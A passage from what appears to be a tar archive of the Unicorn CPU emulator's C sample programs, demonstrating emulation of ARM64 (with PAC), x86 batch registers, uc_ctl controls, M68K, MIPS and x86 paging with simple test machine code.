fprintf(stderr, "FAIL at %s:%d: %s\n", __FILE__, __LINE__, #x); \ exit(1); \ } \ } while (0) /* Test PAC support in the emulator. 
Code adapted from https://github.com/unicorn-engine/unicorn/issues/1789#issuecomment-1536320351 */ static void test_arm64_pac(void) { uc_engine *uc; uint64_t x1 = 0x0000aaaabbbbccccULL; // paciza x1 #define ARM64_PAC_CODE "\xe1\x23\xc1\xda" printf("Try ARM64 PAC\n"); // Initialize emulator in ARM mode CHECK(uc_open(UC_ARCH_ARM64, UC_MODE_ARM, &uc)); CHECK(uc_ctl_set_cpu_model(uc, UC_CPU_ARM64_MAX)); CHECK(uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL)); CHECK( uc_mem_write(uc, ADDRESS, ARM64_PAC_CODE, sizeof(ARM64_PAC_CODE) - 1)); CHECK(uc_reg_write(uc, UC_ARM64_REG_X1, &x1)); /** Initialize PAC support **/ uc_arm64_cp_reg reg; // SCR_EL3 reg.op0 = 0b11; reg.op1 = 0b110; reg.crn = 0b0001; reg.crm = 0b0001; reg.op2 = 0b000; CHECK(uc_reg_read(uc, UC_ARM64_REG_CP_REG, ®)); // NS && RW && API reg.val |= (1 | (1 << 10) | (1 << 17)); CHECK(uc_reg_write(uc, UC_ARM64_REG_CP_REG, ®)); // SCTLR_EL1 reg.op0 = 0b11; reg.op1 = 0b000; reg.crn = 0b0001; reg.crm = 0b0000; reg.op2 = 0b000; CHECK(uc_reg_read(uc, UC_ARM64_REG_CP_REG, ®)); // EnIA && EnIB reg.val |= (1 << 31) | (1 << 30); CHECK(uc_reg_write(uc, UC_ARM64_REG_CP_REG, ®)); // HCR_EL2 reg.op0 = 0b11; reg.op1 = 0b100; reg.crn = 0b0001; reg.crm = 0b0001; reg.op2 = 0b000; // HCR.API reg.val |= (1ULL << 41); CHECK(uc_reg_write(uc, UC_ARM64_REG_CP_REG, ®)); /** Check that PAC worked **/ CHECK( uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(ARM64_PAC_CODE) - 1, 0, 0)); CHECK(uc_reg_read(uc, UC_ARM64_REG_X1, &x1)); printf("X1 = 0x%" PRIx64 "\n", x1); if (x1 == 0x0000aaaabbbbccccULL) { printf("FAIL: No PAC tag added!\n"); } else { // Expect 0x1401aaaabbbbccccULL with the default key printf("SUCCESS: PAC tag found.\n"); } uc_close(uc); } int main(int argc, char **argv, char **envp) { test_arm64_mem_fetch(); printf("-------------------------\n"); test_arm64(); printf("-------------------------\n"); test_arm64eb(); printf("-------------------------\n"); test_arm64_sctlr(); printf("-------------------------\n"); test_arm64_hook_mrs(); printf("-------------------------\n"); test_arm64_pac(); return 0; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_batch_reg.c������������������������������������������������������������0000664�0000000�0000000�00000006037�14675241067�0020301�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #include <string.h> #include <stdio.h> int syscall_abi[] = {UC_X86_REG_RAX, UC_X86_REG_RDI, UC_X86_REG_RSI, UC_X86_REG_RDX, UC_X86_REG_R10, UC_X86_REG_R8, UC_X86_REG_R9}; uint64_t vals[7] = {200, 10, 11, 12, 13, 14, 15}; // This part of the API is less... clean... because Unicorn supports arbitrary // register types. So the least intrusive solution is passing individual // pointers. On the plus side, you only need to make this pointer array once. 
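/*
 * Editor's aside (not in the original sample): each slot in the pointer
 * array must reference storage as wide as its register -- everything in
 * syscall_abi is a 64-bit GPR, hence the uint64_t array above. Mixing
 * register widths means mixing pointee types; roughly:
 *
 *   int regs[] = {UC_X86_REG_RAX, UC_X86_REG_EBX};
 *   uint64_t rax;
 *   uint32_t ebx;                  // 32-bit register, 32-bit destination
 *   void *p[] = {&rax, &ebx};
 *   uc_reg_read_batch(uc, regs, p, 2);
 */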
void *ptrs[7]; void uc_perror(const char *func, uc_err err) { fprintf(stderr, "Error in %s(): %s\n", func, uc_strerror(err)); } #define BASE 0x10000 // mov rax, 100; mov rdi, 1; mov rsi, 2; mov rdx, 3; mov r10, 4; mov r8, 5; mov // r9, 6; syscall #define CODE \ "\x48\xc7\xc0\x64\x00\x00\x00\x48\xc7\xc7\x01\x00\x00\x00\x48\xc7\xc6\x02" \ "\x00\x00\x00\x48\xc7\xc2\x03\x00\x00\x00\x49\xc7\xc2\x04\x00\x00\x00\x49" \ "\xc7\xc0\x05\x00\x00\x00\x49\xc7\xc1\x06\x00\x00\x00\x0f\x05" void hook_syscall(uc_engine *uc, void *user_data) { int i; uc_reg_read_batch(uc, syscall_abi, ptrs, 7); printf("syscall: {"); for (i = 0; i < 7; i++) { if (i != 0) printf(", "); printf("%" PRIu64, vals[i]); } printf("}\n"); } void hook_code(uc_engine *uc, uint64_t addr, uint32_t size, void *user_data) { printf("HOOK_CODE: 0x%" PRIx64 ", 0x%x\n", addr, size); } int main(void) { int i; uc_hook sys_hook; uc_err err; uc_engine *uc; // set up register pointers for (i = 0; i < 7; i++) { ptrs[i] = &vals[i]; } if ((err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc))) { uc_perror("uc_open", err); return 1; } // reg_write_batch printf("reg_write_batch({200, 10, 11, 12, 13, 14, 15})\n"); if ((err = uc_reg_write_batch(uc, syscall_abi, ptrs, 7))) { uc_perror("uc_reg_write_batch", err); return 1; } // reg_read_batch memset(vals, 0, sizeof(vals)); if ((err = uc_reg_read_batch(uc, syscall_abi, ptrs, 7))) { uc_perror("uc_reg_read_batch", err); return 1; } printf("reg_read_batch = {"); for (i = 0; i < 7; i++) { if (i != 0) printf(", "); printf("%" PRIu64, vals[i]); } printf("}\n"); // syscall printf("\n"); printf("running syscall shellcode\n"); if ((err = uc_hook_add(uc, &sys_hook, UC_HOOK_INSN, hook_syscall, NULL, 1, 0, UC_X86_INS_SYSCALL))) { uc_perror("uc_hook_add", err); return 1; } if ((err = uc_mem_map(uc, BASE, 0x1000, UC_PROT_ALL))) { uc_perror("uc_mem_map", err); return 1; } if ((err = uc_mem_write(uc, BASE, CODE, sizeof(CODE) - 1))) { uc_perror("uc_mem_write", err); return 1; } if ((err = uc_emu_start(uc, BASE, BASE + sizeof(CODE) - 1, 0, 0))) { uc_perror("uc_emu_start", err); return 1; } uc_close(uc); return 0; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_ctl.c������������������������������������������������������������������0000664�0000000�0000000�00000017515�14675241067�0017150�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Lazymio(@wtdcode), 2021 */ /* Sample code to demonstrate how to use uc_ctl */ #include <unicorn/unicorn.h> #include <string.h> #include <time.h> // code to be emulated // INC ecx; DEC edx; PXOR xmm0, xmm1 #define X86_CODE32 "\x41\x4a" // cmp eax, 0; // jg lb; // inc eax; // nop; // lb: // inc ebx; // nop; #define X86_JUMP_CODE "\x83\xf8\x00\x7f\x02\x40\x90\x43\x90" // memory address where emulation starts #define 
ADDRESS 0x10000 static void test_uc_ctl_read(void) { uc_engine *uc; uc_err err; int mode, arch; uint32_t pagesize; uint64_t timeout; printf("Reading some properties by uc_ctl.\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // Let's query some properties by uc_ctl. // Note the uc_ctl_* helpers are just tiny macro wrappers around uc_ctl(). err = uc_ctl_get_mode(uc, &mode); if (err) { printf("Failed on uc_ctl() with error returned: %u\n", err); return; } err = uc_ctl_get_arch(uc, &arch); if (err) { printf("Failed on uc_ctl() with error returned: %u\n", err); return; } err = uc_ctl_get_timeout(uc, &timeout); if (err) { printf("Failed on uc_ctl() with error returned: %u\n", err); return; } err = uc_ctl_get_page_size(uc, &pagesize); if (err) { printf("Failed on uc_ctl() with error returned: %u\n", err); return; } printf(">>> mode = %d, arch = %d, timeout=%" PRIu64 ", pagesize=%" PRIu32 "\n", mode, arch, timeout, pagesize); uc_close(uc); } static void trace_new_edge(uc_engine *uc, uc_tb *cur, uc_tb *prev, void *data) { printf(">>> Getting a new edge from 0x%" PRIx64 " to 0x%" PRIx64 ".\n", prev->pc + prev->size - 1, cur->pc); } void test_uc_ctl_exits(void) { uc_engine *uc; uc_err err; uc_hook h; int r_eax, r_ebx; uint64_t exits[] = {ADDRESS + 6, ADDRESS + 8}; printf("Using multiple exits by uc_ctl.\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } err = uc_mem_map(uc, ADDRESS, 0x1000, UC_PROT_ALL); if (err) { printf("Failed on uc_mem_map() with error returned: %u\n", err); return; } // Write our code to the memory. err = uc_mem_write(uc, ADDRESS, X86_JUMP_CODE, sizeof(X86_JUMP_CODE) - 1); if (err) { printf("Failed on uc_mem_write() with error returned: %u\n", err); return; } // We trace if any new edge is generated. err = uc_hook_add(uc, &h, UC_HOOK_EDGE_GENERATED, trace_new_edge, NULL, 0, -1); if (err) { printf("Failed on uc_hook_add() with error returned: %u\n", err); return; } // Enable multiple exits. err = uc_ctl_exits_enable(uc); if (err) { printf("Failed on uc_ctl() with error returned: %u\n", err); return; } err = uc_ctl_set_exits(uc, exits, 2); if (err) { printf("Failed on uc_ctl() with error returned: %u\n", err); return; } // This should stop at ADDRESS + 6 and increase eax, even though we don't // provide an exit. err = uc_emu_start(uc, ADDRESS, 0, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); return; } err = uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); if (err) { printf("Failed on uc_reg_read() with error returned: %u\n", err); return; } err = uc_reg_read(uc, UC_X86_REG_EBX, &r_ebx); if (err) { printf("Failed on uc_reg_read() with error returned: %u\n", err); return; } printf(">>> eax = %" PRId32 " and ebx = %" PRId32 " after the first emulation\n", r_eax, r_ebx); // This should stop at ADDRESS + 8, even though we don't provide an exit.
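/*
 * Editor's aside (not in the original sample): once exits are enabled via
 * uc_ctl_exits_enable(), the configured list can also be read back. A
 * hedged sketch using the wrapper macros declared in unicorn.h:
 *
 *   size_t cnt;
 *   if (uc_ctl_get_exits_cnt(uc, &cnt) == UC_ERR_OK && cnt > 0) {
 *       uint64_t *buf = malloc(cnt * sizeof(uint64_t));  // needs <stdlib.h>
 *       if (buf && uc_ctl_get_exits(uc, buf, cnt) == UC_ERR_OK) {
 *           // buf[0..cnt-1] now mirrors the exits[] array set above
 *       }
 *       free(buf);
 *   }
 */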
err = uc_emu_start(uc, ADDRESS, 0, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); return; } err = uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); if (err) { printf("Failed on uc_reg_read() with error returned: %u\n", err); return; } err = uc_reg_read(uc, UC_X86_REG_EBX, &r_ebx); if (err) { printf("Failed on uc_reg_read() with error returned: %u\n", err); return; } printf(">>> eax = %" PRId32 " and ebx = %" PRId32 " after the second emulation\n", r_eax, r_ebx); uc_close(uc); } #define TB_COUNT (8) #define TCG_MAX_INSNS (512) // from tcg.h #define CODE_LEN TB_COUNT * TCG_MAX_INSNS double time_emulation(uc_engine *uc, uint64_t start, uint64_t end) { time_t t1, t2; t1 = clock(); uc_emu_start(uc, start, end, 0, 0); t2 = clock(); return (t2 - t1) * 1000.0 / CLOCKS_PER_SEC; } static void test_uc_ctl_tb_cache(void) { uc_engine *uc; uc_err err; uc_tb tb; uc_hook h; char code[CODE_LEN]; double standard, cached, evicted; printf("Controlling the TB cache at a finer granularity via uc_ctl.\n"); // Fill the code buffer with NOP. memset(code, 0x90, CODE_LEN); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } err = uc_mem_map(uc, ADDRESS, 0x10000, UC_PROT_ALL); if (err) { printf("Failed on uc_mem_map() with error returned: %u\n", err); return; } // Write our code to the memory. err = uc_mem_write(uc, ADDRESS, code, sizeof(code) - 1); if (err) { printf("Failed on uc_mem_write() with error returned: %u\n", err); return; } // We trace if any new edge is generated. // Note: In this sample, there is only **one** basic block while multiple // translation blocks are generated due to the QEMU tcg buffer limit. In this // case, we don't consider it a new edge. err = uc_hook_add(uc, &h, UC_HOOK_EDGE_GENERATED, trace_new_edge, NULL, 0, -1); if (err) { printf("Failed on uc_hook_add() with error returned: %u\n", err); return; } // Do emulation without any cache. standard = time_emulation(uc, ADDRESS, ADDRESS + sizeof(code) - 1); // Now we request cache for all TBs. for (int i = 0; i < TB_COUNT; i++) { err = uc_ctl_request_cache(uc, (uint64_t)(ADDRESS + i * TCG_MAX_INSNS), &tb); if (err) { printf("Failed on uc_ctl() with error returned: %u\n", err); return; } printf(">>> TB is cached at 0x%" PRIx64 " which has %" PRIu16 " instructions with %" PRIu16 " bytes.\n", tb.pc, tb.icount, tb.size); } // Do emulation with all TB cached. cached = time_emulation(uc, ADDRESS, ADDRESS + sizeof(code) - 1); // Now we clear cache for all TBs. for (int i = 0; i < TB_COUNT; i++) { err = uc_ctl_remove_cache(uc, (uint64_t)(ADDRESS + i * TCG_MAX_INSNS), (uint64_t)(ADDRESS + i * TCG_MAX_INSNS + 1)); if (err) { printf("Failed on uc_ctl() with error returned: %u\n", err); return; } } // Do emulation with all TB cache evicted.
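/*
 * Editor's aside (not in the original sample): uc_ctl_remove_cache()
 * invalidates translation blocks in a given address range; to drop the
 * entire translation cache in one call, unicorn.h also wraps
 * UC_CTL_TB_FLUSH, roughly:
 *
 *   err = uc_ctl_flush_tb(uc);   // invalidate every cached TB at once
 *   if (err) {
 *       printf("Failed on uc_ctl() with error returned: %u\n", err);
 *   }
 */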
evicted = time_emulation(uc, ADDRESS, ADDRESS + sizeof(code) - 1); printf(">>> Run time: First time: %f, Cached: %f, Cache evicted: %f\n", standard, cached, evicted); uc_close(uc); } int main(int argc, char **argv, char **envp) { test_uc_ctl_read(); printf("====================\n"); test_uc_ctl_exits(); printf("====================\n"); test_uc_ctl_tb_cache(); return 0; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_m68k.c�����������������������������������������������������������������0000664�0000000�0000000�00000011452�14675241067�0017145�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Loi Anh Tuan, 2015 */ /* Sample code to demonstrate how to emulate m68k code */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated #define M68K_CODE "\x76\xed" // movq #-19, %d3 // memory address where emulation starts #define ADDRESS 0x10000 static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n", address, size); } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); } static void test_m68k(void) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; int d0 = 0x0000; // d0 data register int d1 = 0x0000; // d1 data register int d2 = 0x0000; // d2 data register int d3 = 0x0000; // d3 data register int d4 = 0x0000; // d4 data register int d5 = 0x0000; // d5 data register int d6 = 0x0000; // d6 data register int d7 = 0x0000; // d7 data register int a0 = 0x0000; // a0 address register int a1 = 0x0000; // a1 address register int a2 = 0x0000; // a2 address register int a3 = 0x0000; // a3 address register int a4 = 0x0000; // a4 address register int a5 = 0x0000; // a5 address register int a6 = 0x0000; // a6 address register int a7 = 0x0000; // a6 address register int pc = 0x0000; // program counter int sr = 0x0000; // status register printf("Emulate M68K code\n"); // Initialize emulator in M68K mode err = uc_open(UC_ARCH_M68K, UC_MODE_BIG_ENDIAN, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, M68K_CODE, sizeof(M68K_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_M68K_REG_D0, &d0); uc_reg_write(uc, UC_M68K_REG_D1, &d1); uc_reg_write(uc, UC_M68K_REG_D2, &d2); uc_reg_write(uc, UC_M68K_REG_D3, &d3); uc_reg_write(uc, UC_M68K_REG_D4, &d4); uc_reg_write(uc, UC_M68K_REG_D5, &d5); uc_reg_write(uc, UC_M68K_REG_D6, &d6); uc_reg_write(uc, UC_M68K_REG_D7, &d7); uc_reg_write(uc, UC_M68K_REG_A0, &a0); uc_reg_write(uc, UC_M68K_REG_A1, &a1); uc_reg_write(uc, UC_M68K_REG_A2, &a2); uc_reg_write(uc, UC_M68K_REG_A3, &a3); uc_reg_write(uc, UC_M68K_REG_A4, &a4); uc_reg_write(uc, UC_M68K_REG_A5, &a5); uc_reg_write(uc, UC_M68K_REG_A6, &a6); 
    uc_reg_write(uc, UC_M68K_REG_A7, &a7);
    uc_reg_write(uc, UC_M68K_REG_PC, &pc);
    uc_reg_write(uc, UC_M68K_REG_SR, &sr);

    // tracing all basic blocks with customized callback
    uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0);

    // tracing all instructions
    uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0);

    // emulate machine code in infinite time (last param = 0), or when
    // finishing all the code.
    err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(M68K_CODE) - 1, 0, 0);
    if (err) {
        printf("Failed on uc_emu_start() with error returned: %u\n", err);
    }

    // now print out some registers
    printf(">>> Emulation done. Below is the CPU context\n");

    uc_reg_read(uc, UC_M68K_REG_D0, &d0);
    uc_reg_read(uc, UC_M68K_REG_D1, &d1);
    uc_reg_read(uc, UC_M68K_REG_D2, &d2);
    uc_reg_read(uc, UC_M68K_REG_D3, &d3);
    uc_reg_read(uc, UC_M68K_REG_D4, &d4);
    uc_reg_read(uc, UC_M68K_REG_D5, &d5);
    uc_reg_read(uc, UC_M68K_REG_D6, &d6);
    uc_reg_read(uc, UC_M68K_REG_D7, &d7);
    uc_reg_read(uc, UC_M68K_REG_A0, &a0);
    uc_reg_read(uc, UC_M68K_REG_A1, &a1);
    uc_reg_read(uc, UC_M68K_REG_A2, &a2);
    uc_reg_read(uc, UC_M68K_REG_A3, &a3);
    uc_reg_read(uc, UC_M68K_REG_A4, &a4);
    uc_reg_read(uc, UC_M68K_REG_A5, &a5);
    uc_reg_read(uc, UC_M68K_REG_A6, &a6);
    uc_reg_read(uc, UC_M68K_REG_A7, &a7);
    uc_reg_read(uc, UC_M68K_REG_PC, &pc);
    uc_reg_read(uc, UC_M68K_REG_SR, &sr);

    printf(">>> A0 = 0x%x\t\t>>> D0 = 0x%x\n", a0, d0);
    printf(">>> A1 = 0x%x\t\t>>> D1 = 0x%x\n", a1, d1);
    printf(">>> A2 = 0x%x\t\t>>> D2 = 0x%x\n", a2, d2);
    printf(">>> A3 = 0x%x\t\t>>> D3 = 0x%x\n", a3, d3);
    printf(">>> A4 = 0x%x\t\t>>> D4 = 0x%x\n", a4, d4);
    printf(">>> A5 = 0x%x\t\t>>> D5 = 0x%x\n", a5, d5);
    printf(">>> A6 = 0x%x\t\t>>> D6 = 0x%x\n", a6, d6);
    printf(">>> A7 = 0x%x\t\t>>> D7 = 0x%x\n", a7, d7);
    printf(">>> PC = 0x%x\n", pc);
    printf(">>> SR = 0x%x\n", sr);

    uc_close(uc);
}

int main(int argc, char **argv, char **envp)
{
    test_m68k();

    return 0;
}

unicorn-2.1.1/samples/sample_mips.c

/* Unicorn Emulator Engine */
/* By Nguyen Anh Quynh, 2015 */

/* Sample code to demonstrate how to emulate Mips code (big endian) */

#include <unicorn/unicorn.h>
#include <string.h>

// code to be emulated
#define MIPS_CODE_EB "\x34\x21\x34\x56" // ori $at, $at, 0x3456;
#define MIPS_CODE_EL "\x56\x34\x21\x34" // ori $at, $at, 0x3456;

// memory address where emulation starts
#define ADDRESS 0x10000

static void hook_block(uc_engine *uc, uint64_t address, uint32_t size,
                       void *user_data)
{
    printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n",
           address, size);
}

static void hook_code(uc_engine *uc, uint64_t address, uint32_t size,
                      void *user_data)
{
    printf(">>> Tracing instruction at 0x%" PRIx64
           ", instruction size = 0x%x\n",
           address, size);
}

static void test_mips_eb(void)
{
    uc_engine *uc;
    uc_err err;
    uc_hook trace1, trace2;

    int r1 = 0x6789; // R1 register

    printf("Emulate MIPS code 
(big-endian)\n"); // Initialize emulator in MIPS mode err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, MIPS_CODE_EB, sizeof(MIPS_CODE_EB) - 1); // initialize machine registers uc_reg_write(uc, UC_MIPS_REG_1, &r1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(MIPS_CODE_EB) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u (%s)\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_MIPS_REG_1, &r1); printf(">>> R1 = 0x%x\n", r1); uc_close(uc); } static void test_mips_el(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int r1 = 0x6789; // R1 register printf("===========================\n"); printf("Emulate MIPS code (little-endian)\n"); // Initialize emulator in MIPS mode err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, MIPS_CODE_EL, sizeof(MIPS_CODE_EL) - 1); // initialize machine registers uc_reg_write(uc, UC_MIPS_REG_1, &r1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(MIPS_CODE_EL) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u (%s)\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. 
Below is the CPU context\n");

    uc_reg_read(uc, UC_MIPS_REG_1, &r1);
    printf(">>> R1 = 0x%x\n", r1);

    uc_close(uc);
}

int main(int argc, char **argv, char **envp)
{
    test_mips_eb();
    test_mips_el();

    return 0;
}

unicorn-2.1.1/samples/sample_mmu.c

#include <unicorn/unicorn.h>
#include <stdio.h>

/*
 * mov rax, 57
 * syscall
 * test rax, rax
 * jz child
 * xor rax, rax
 * mov rax, 60
 * mov [0x4000], rax
 * syscall
 *
 * child:
 * xor rcx, rcx
 * mov rcx, 42
 * mov [0x4000], rcx
 * mov rax, 60
 * syscall
 */
char code[] = "\xB8\x39\x00\x00\x00\x0F\x05\x48\x85\xC0\x74\x0F\xB8\x3C\x00\x00"
              "\x00\x48\x89\x04\x25\x00\x40\x00\x00\x0F\x05\xB9\x2A\x00\x00\x00"
              "\x48\x89\x0C\x25\x00\x40\x00\x00\xB8\x3C\x00\x00\x00\x0F\x05";

static void mmu_write_callback(uc_engine *uc, uc_mem_type type,
                               uint64_t address, int size, int64_t value,
                               void *user_data)
{
    printf("write at 0x%lx: 0x%lx\n", address, value);
}

static void x86_mmu_prepare_tlb(uc_engine *uc, uint64_t vaddr,
                                uint64_t tlb_base)
{
    uc_err err;
    uint64_t cr0;
    uint64_t cr4;
    uc_x86_msr msr = {.rid = 0xC0000080, .value = 0};
    uint64_t pml4o = ((vaddr & 0x00ff8000000000) >> 39) * 8;
    uint64_t pdpo = ((vaddr & 0x00007fc0000000) >> 30) * 8;
    uint64_t pdo = ((vaddr & 0x0000003fe00000) >> 21) * 8;
    uint64_t pml4e = (tlb_base + 0x1000) | 1 | (1 << 2);
    uint64_t pdpe = (tlb_base + 0x2000) | 1 | (1 << 2);
    uint64_t pde = (tlb_base + 0x3000) | 1 | (1 << 2);

    err = uc_mem_write(uc, tlb_base + pml4o, &pml4e, sizeof(pml4e));
    if (err) {
        printf("failed to write pml4e\n");
        exit(1);
    }
    err = uc_mem_write(uc, tlb_base + 0x1000 + pdpo, &pdpe, sizeof(pdpe));
    if (err) {
        printf("failed to write pdpe\n");
        exit(1);
    }
    err = uc_mem_write(uc, tlb_base + 0x2000 + pdo, &pde, sizeof(pde));
    if (err) {
        printf("failed to write pde\n");
        exit(1);
    }
    err = uc_reg_write(uc, UC_X86_REG_CR3, &tlb_base);
    if (err) {
        printf("failed to write CR3\n");
        exit(1);
    }
    err = uc_reg_read(uc, UC_X86_REG_CR0, &cr0);
    if (err) {
        printf("failed to read CR0\n");
        exit(1);
    }
    err = uc_reg_read(uc, UC_X86_REG_CR4, &cr4);
    if (err) {
        printf("failed to read CR4\n");
        exit(1);
    }
    err = uc_reg_read(uc, UC_X86_REG_MSR, &msr);
    if (err) {
        printf("failed to read MSR\n");
        exit(1);
    }

    cr0 |= 1;             // enable protected mode
    cr0 |= 1l << 31;      // enable paging
    cr4 |= 1l << 5;       // enable physical address extension
    msr.value |= 1l << 8; // enable long mode

    err = uc_reg_write(uc, UC_X86_REG_CR0, &cr0);
    if (err) {
        printf("failed to write CR0\n");
        exit(1);
    }
    err = uc_reg_write(uc, UC_X86_REG_CR4, &cr4);
    if (err) {
        printf("failed to write CR4\n");
        exit(1);
    }
    err = uc_reg_write(uc, UC_X86_REG_MSR, &msr);
    if (err) {
        printf("failed to write MSR\n");
        exit(1);
    }
}

static void x86_mmu_pt_set(uc_engine *uc, uint64_t vaddr, uint64_t paddr,
                           uint64_t tlb_base)
{
    uint64_t pto = ((vaddr & 0x000000001ff000) >> 12) * 8;
    uint32_t pte = (paddr) | 1 | (1 << 2);

    uc_mem_write(uc, tlb_base + 0x3000 + pto, &pte, sizeof(pte));
}
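/*
 * (Added note) How the helpers above build the guest page tables, assuming
 * standard x86-64 4-level paging: the virtual address is sliced into table
 * indices (bits 39-47 PML4, 30-38 PDPT, 21-29 PD, 12-20 PT), each entry is
 * flagged present (bit 0) and user-accessible (bit 2), and CR3 points at the
 * PML4 at tlb_base. x86_mmu_prepare_tlb() also sets CR0.PE, CR0.PG, CR4.PAE
 * and EFER.LME (MSR 0xC0000080), which is the minimal switch into 64-bit
 * long mode with paging enabled.
 */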
printf("failed to read rax\n"); exit(1); } switch (rax) { case 57: /* fork */ break; case 60: /* exit */ *parrent_done = true; uc_emu_stop(uc); return; default: printf("unknown syscall"); exit(1); } if (!(*parrent_done)) { rax = 27; err = uc_reg_write(uc, UC_X86_REG_RAX, &rax); if (err) { printf("failed to write rax\n"); exit(1); } uc_emu_stop(uc); } } void cpu_tlb(void) { uint64_t tlb_base = 0x3000; uint64_t rax, rip; bool parrent_done = false; uint64_t parrent, child; uc_context *context; uc_engine *uc; uc_err err; uc_hook h1, h2; printf("Emulate x86 amd64 code with mmu enabled and switch mappings\n"); err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); exit(1); } uc_ctl_tlb_mode(uc, UC_TLB_CPU); err = uc_context_alloc(uc, &context); if (err) { printf("Failed on uc_context_alloc() with error returned: %u\n", err); exit(1); } err = uc_hook_add(uc, &h1, UC_HOOK_INSN, &x86_mmu_syscall_callback, &parrent_done, 1, 0, UC_X86_INS_SYSCALL); if (err) { printf("Failed on uc_hook_add() with error returned: %u\n", err); exit(1); } // Memory hooks are called after the mmu translation, so hook the physicall // addresses err = uc_hook_add(uc, &h2, UC_HOOK_MEM_WRITE, &mmu_write_callback, NULL, 0x1000, 0x3000); if (err) { printf("Faled on uc_hook_add() with error returned: %u\n", err); } printf("map code\n"); err = uc_mem_map(uc, 0x0, 0x1000, UC_PROT_ALL); // Code if (err) { printf("Failed on uc_mem_map() with error return: %u\n", err); exit(1); } err = uc_mem_write(uc, 0x0, code, sizeof(code) - 1); if (err) { printf("Failed on uc_mem_wirte() with error return: %u\n", err); exit(1); } printf("map parrent memory\n"); err = uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL); // Parrent if (err) { printf("Failed on uc_mem_map() with error return: %u\n", err); exit(1); } printf("map child memory\n"); err = uc_mem_map(uc, 0x2000, 0x1000, UC_PROT_ALL); // Child if (err) { printf("failed to map child memory\n"); exit(1); } printf("map tlb memory\n"); err = uc_mem_map(uc, tlb_base, 0x4000, UC_PROT_ALL); // TLB if (err) { printf("failed to map 